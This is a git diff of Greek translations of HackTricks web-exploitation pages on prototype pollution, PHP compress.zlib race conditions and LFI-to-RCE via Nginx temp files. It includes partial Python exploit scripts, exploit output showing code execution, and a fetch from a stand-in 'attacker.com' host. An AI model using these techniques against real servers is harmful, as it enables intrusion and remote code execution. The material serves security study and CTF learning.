||||
### Επιτρέψτε τελείες
|
||||
### Επιτρέψτε τα Τελεία
|
||||
|
||||
Υπάρχει μια επιλογή στο Express που σας επιτρέπει να **δημιουργείτε αντικείμενα από τις παραμέτρους του αλφαριθμητικού ερωτήματος**.\
|
||||
Σίγουρα θα μπορούσατε να το χρησιμοποιήσετε σε μια αλυσίδα σφάλματος για να εκμεταλλευτείτε μια ευπάθεια **προσβολής του προτύπου**.
|
||||
Υπάρχει μια επιλογή στο Express που σας επιτρέπει να **δημιουργήσετε αντικείμενα από τις παραμέτρους της συμβολοσειράς ερωτήματος**.\
|
||||
Σίγουρα θα μπορούσατε να το χρησιμοποιήσετε σε μια αλυσίδα σφαλμάτων για να εκμεταλλευτείτε μια **ευπάθεια προσβολής πρωτοτύπου**.
|
||||
```json
|
||||
{"__proto__":{"allowDots":true}}
|
||||
```
|
||||
|
@ -110,16 +124,29 @@ res.send(req.body);
|
|||
|
||||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφή**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,29 +1,42 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## `compress.zlib://` και `PHP_STREAM_PREFER_STDIO`
|
||||
|
||||
Ένα αρχείο που ανοίγει χρησιμοποιώντας το πρωτόκολλο `compress.zlib://` με τη σημαία `PHP_STREAM_PREFER_STDIO` μπορεί να συνεχίσει να γράφει δεδομένα που φτάνουν στη σύνδεση αργότερα στο ίδιο αρχείο.
|
||||
Ένα αρχείο που ανοίγεται χρησιμοποιώντας το πρωτόκολλο `compress.zlib://` με τη σημαία `PHP_STREAM_PREFER_STDIO` μπορεί να συνεχίσει να γράφει δεδομένα που φτάνουν στη σύνδεση αργότερα στο ίδιο αρχείο.
|
||||
|
||||
Αυτό σημαίνει ότι μια κλήση όπως:
|
||||
```php
|
||||
file_get_contents("compress.zlib://http://attacker.com/file")
|
||||
```
|
||||
Θα στείλει ένα αίτημα ζητώντας το http://attacker.com/file, στη συνέχεια ο διακομιστής μπορεί να απαντήσει στο αίτημα με ένα έγκυρο HTTP αποτέλεσμα, να διατηρήσει τη σύνδεση ανοιχτή και να στείλει επιπλέον δεδομένα αργότερα που θα γραφούν επίσης στο αρχείο.
|
||||
Θα στείλει ένα αίτημα ζητώντας το http://attacker.com/file, στη συνέχεια ο διακομιστής ενδέχεται να απαντήσει στο αίτημα με ένα έγκυρο HTTP αποτέλεσμα, να διατηρήσει τη σύνδεση ανοιχτή, και να στείλει επιπλέον δεδομένα αργότερα τα οποία θα γραφτούν επίσης στο αρχείο.
|
||||
|
||||
Μπορείτε να δείτε αυτές τις πληροφορίες στο τμήμα του κώδικα php-src στο main/streams/cast.c:
|
||||
Μπορείτε να δείτε αυτές τις πληροφορίες σε αυτό το τμήμα του κώδικα php-src στο main/streams/cast.c:
|
||||
```c
|
||||
/* Use a tmpfile and copy the old streams contents into it */
|
||||
|
||||
|
@ -33,31 +46,42 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
|
|||
*newstream = php_stream_temp_new();
|
||||
}
|
||||
```
|
||||
## Αγωνιστική Κατάσταση για Αποκτηση Απομακρυσμένης Εκτέλεσης Κώδικα (RCE)
|
||||
## Αγώνας Κατάστασης προς RCE
|
||||
|
||||
[**Αυτό το CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) λύθηκε χρησιμοποιώντας το προηγούμενο κόλπο.
|
||||
|
||||
Ο επιτιθέμενος θα κάνει το **θύμα server να ανοίξει μια σύνδεση για να διαβάσει ένα αρχείο από τον server του επιτιθέμενου** χρησιμοποιώντας το πρωτόκολλο **`compress.zlib`**.
|
||||
Ο επιτιθέμενος θα κάνει το **θύμα server να ανοίξει μια σύνδεση διαβάζοντας ένα αρχείο από το server του επιτιθέμενου** χρησιμοποιώντας το πρωτόκολλο **`compress.zlib`**.
|
||||
|
||||
**Ενώ** αυτή η **σύνδεση** υπάρχει, ο επιτιθέμενος θα **αποκτήσει τη διαδρομή** προς το προσωρινό αρχείο που δημιουργήθηκε (αποκαλύπτεται από τον server).
|
||||
**Ενώ** αυτή η **σύνδεση** υπάρχει, ο επιτιθέμενος θα **εξαγάγει τη διαδρομή** προς το προσωρινό αρχείο που δημιουργήθηκε (αποκαλύπτεται από τον server).
|
||||
|
||||
**Ενώ** η **σύνδεση** είναι ακόμα ανοιχτή, ο επιτιθέμενος θα **εκμεταλλευτεί μια LFI φορτώνοντας το προσωρινό αρχείο** που ελέγχει.
|
||||
|
||||
Ωστόσο, υπάρχει ένας έλεγχος στον web server που **αποτρέπει τη φόρτωση αρχείων που περιέχουν `<?`**. Επομένως, ο επιτιθέμενος θα εκμεταλλευτεί μια **Αγωνιστική Κατάσταση**. Στη σύνδεση που είναι ακόμα ανοιχτή, ο **επιτιθέμενος** θα **στείλει το PHP payload ΜΕΤΑ** το **web server** να **έχει ελέγξει** αν το αρχείο περιέχει τους απαγορευμένους χαρακτήρες αλλά **ΠΡΙΝ φορτώσει το περιεχόμενό του**.
|
||||
Ωστόσο, υπάρχει έλεγχος στον web server που **εμποδίζει τη φόρτωση αρχείων που περιέχουν `<?`**. Επομένως, ο επιτιθέμενος θα εκμεταλλευτεί μια **Κατάσταση Αγώνα**. Στη σύνδεση που είναι ακόμα ανοιχτή, ο **επιτιθέμενος** θα **στείλει το PHP payload ΜΕΤΑ** το **webserver** να **έχει ελέγξει** αν το αρχείο περιέχει τους απαγορευμένους χαρακτήρες αλλά **ΠΡΙΝ φορτώσει το περιεχόμενό του**.
|
||||
|
||||
Για περισσότερες πληροφορίες, ελέγξτε την περιγραφή της Αγωνιστικής Κατάστασης και του CTF στο [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||
Για περισσότερες πληροφορίες ελέγξτε την περιγραφή της Κατάστασης Αγώνα και του CTF στο [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των καταλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους **δωρεάν** στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** Ελέγξτε τα [**ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,28 +1,42 @@
|
|||
# LFI2RCE μέσω αρχείων προσωρινής αποθήκευσης του Nginx
|
||||
# LFI2RCE μέσω αρχείων προσωρινών αρχείων Nginx
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Ευάλωτη διαμόρφωση
|
||||
|
||||
**[Παράδειγμα από https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
|
||||
|
||||
* Κώδικας PHP:
|
||||
```
|
||||
````h`
|
||||
<?php include_once($_GET['file']);
|
||||
```
|
||||
* Ρύθμιση FPM / PHP:
|
||||
* FPM / PHP ρυθμίσεις:
|
||||
```
|
||||
...
|
||||
php_admin_value[session.upload_progress.enabled] = 0
|
||||
|
@ -30,15 +44,15 @@ php_admin_value[file_uploads] = 0
|
|||
...
|
||||
```
|
||||
* Ρύθμιση / ενίσχυση:
|
||||
```
|
||||
```bash
|
||||
...
|
||||
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
|
||||
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
||||
...
|
||||
```
|
||||
Ευτυχώς, η PHP συχνά εγκαθίσταται μέσω της PHP-FPM και του Nginx. Το Nginx προσφέρει μια επιλογή [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) που συχνά παραβλέπεται και θα δημιουργήσει προσωρινά αρχεία εάν το σώμα του πελάτη (όχι μόνο για αιτήσεις POST) είναι μεγαλύτερο από ένα συγκεκριμένο όριο.
|
||||
Ευτυχώς, η PHP συχνά χρησιμοποιείται μέσω του PHP-FPM και του Nginx. Το Nginx προσφέρει μια εύκολα παραβλεπόμενη [λειτουργία client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) που θα γράψει προσωρινά αρχεία εάν το σώμα του πελάτη (όχι περιορισμένο σε post) είναι μεγαλύτερο από ένα συγκεκριμένο όριο.
|
||||
|
||||
Αυτή η δυνατότητα επιτρέπει την εκμετάλλευση των LFI χωρίς καμία άλλη μέθοδο δημιουργίας αρχείων, εάν το Nginx εκτελείται με τον ίδιο χρήστη με την PHP (πολύ συχνά γίνεται αυτό με τον χρήστη www-data).
|
||||
Αυτή η λειτουργία επιτρέπει την εκμετάλλευση των LFIs χωρίς καμία άλλη δυνατότητα δημιουργίας αρχείων, εάν το Nginx τρέχει με τον ίδιο χρήστη με την PHP (πολύ συχνά γίνεται ως www-data).
|
||||
|
||||
Σχετικός κώδικας Nginx:
|
||||
```c
|
||||
|
@ -57,7 +71,7 @@ if (fd != -1 && !persistent) {
|
|||
return fd;
|
||||
}
|
||||
```
|
||||
Είναι ορατό ότι το **tempfile διαγράφεται αμέσως μετά το άνοιγμα από το Nginx**. Ευτυχώς, **το procfs μπορεί να χρησιμοποιηθεί για να αποκτηθεί ακόμα μια αναφορά** στο διαγραμμένο αρχείο μέσω ενός αγώνα:
|
||||
Είναι ορατό ότι το **tempfile διαγράφεται αμέσως** μετά το άνοιγμά του από το Nginx. Ευτυχώς, το **procfs μπορεί να χρησιμοποιηθεί για να αποκτηθεί ακόμα μια αναφορά** στο διαγεγραμμένο αρχείο μέσω ενός αγώνα:
|
||||
```
|
||||
...
|
||||
/proc/34/fd:
|
||||
|
@ -72,7 +86,7 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
|
|||
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
|
||||
...
|
||||
```
|
||||
Σημείωση: Δεν είναι δυνατή η άμεση συμπερίληψη του `/proc/34/fd/15` σε αυτό το παράδειγμα, καθώς η λειτουργία `include` του PHP θα αναλύσει τη διαδρομή σε `/var/lib/nginx/body/0000001368 (deleted)`, η οποία δεν υπάρχει στο σύστημα αρχείων. Αυτός ο περιορισμός μπορεί ευτυχώς να παρακαμφθεί με κάποια έμμεση αναφορά όπως: `/proc/self/fd/34/../../../34/fd/15`, η οποία θα εκτελέσει τελικά το περιεχόμενο του διαγραμμένου αρχείου `/var/lib/nginx/body/0000001368`.
|
||||
Σημείωση: Δεν είναι δυνατή η άμεση συμπερίληψη του `/proc/34/fd/15` σε αυτό το παράδειγμα, καθώς η λειτουργία `include` του PHP θα αναλύσει τη διαδρομή σε `/var/lib/nginx/body/0000001368 (deleted)` η οποία δεν υπάρχει στο σύστημα αρχείων. Αυτό το μικρό περιορισμό μπορεί ευτυχώς να παρακαμφθεί με κάποια έμμεση μέθοδο όπως: `/proc/self/fd/34/../../../34/fd/15` το οποίο τελικά θα εκτελέσει το περιεχόμενο του διαγεγραμμένου αρχείου `/var/lib/nginx/body/0000001368`.
|
||||
|
||||
## Πλήρης Εκμετάλλευση
|
||||
```python
|
||||
|
@ -143,43 +157,7 @@ for pid in nginx_workers:
|
|||
a = threading.Thread(target=bruter, args=(pid, ))
|
||||
a.start()
|
||||
```
|
||||
# LFI to RCE via Nginx Temp Files
|
||||
|
||||
In this technique, we will exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) by leveraging Nginx temporary files.
|
||||
|
||||
## Introduction
|
||||
|
||||
Nginx is a popular web server that uses temporary files to store client request bodies. These temporary files are created when a client uploads a file to the server. By exploiting an LFI vulnerability, we can manipulate the file path and inject malicious code into the temporary file, which will then be executed by the server.
|
||||
|
||||
## Exploitation Steps
|
||||
|
||||
1. Identify the LFI vulnerability: Look for user-controlled input that is not properly sanitized and can be used to include local files.
|
||||
|
||||
2. Determine the location of the Nginx temporary files: The default location is usually `/var/tmp/nginx`.
|
||||
|
||||
3. Craft the payload: Use the LFI vulnerability to include the Nginx temporary file and inject your malicious code.
|
||||
|
||||
4. Trigger the payload: Access the vulnerable page and include the Nginx temporary file with the injected code.
|
||||
|
||||
5. Execute the payload: The server will execute the injected code when it processes the Nginx temporary file.
|
||||
|
||||
## Example Payload
|
||||
|
||||
Assuming the LFI vulnerability allows us to include files using a parameter named `file`, and the Nginx temporary files are located in `/var/tmp/nginx`, we can craft the following payload:
|
||||
|
||||
```
|
||||
http://example.com/vulnerable.php?file=/var/tmp/nginx/upload_1234.php&cmd=id
|
||||
```
|
||||
|
||||
In this example, we are including the Nginx temporary file `upload_1234.php` and executing the `id` command.
|
||||
|
||||
## Mitigation
|
||||
|
||||
To prevent this type of attack, it is important to properly sanitize user-controlled input and validate file paths before including them. Additionally, restricting access to the Nginx temporary files directory can help mitigate the risk.
|
||||
|
||||
## Conclusion
|
||||
|
||||
By exploiting an LFI vulnerability and leveraging Nginx temporary files, we can achieve RCE and execute arbitrary code on the server. It is crucial for developers and system administrators to be aware of this technique and implement proper security measures to prevent such attacks.
|
||||
Έξοδος:
|
||||
```
|
||||
$ ./pwn.py 127.0.0.1 1337
|
||||
[*] cpus: 2; pid_max: 32768
|
||||
|
@ -205,9 +183,9 @@ $ ./pwn.py 127.0.0.1 1337
|
|||
[+] brute loop restarted: 34
|
||||
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
```
|
||||
### Ένα Άλλο Εκμεταλλευτήριο
|
||||
### Άλλη εκμετάλλευση
|
||||
|
||||
Αυτό είναι από το [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/)
|
||||
Αυτό προέρχεται από [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/)
|
||||
```python
|
||||
import requests
|
||||
import threading
|
||||
|
@ -314,16 +292,28 @@ read_file_multiprocess(requests_session, nginx_pids)
|
|||
|
||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
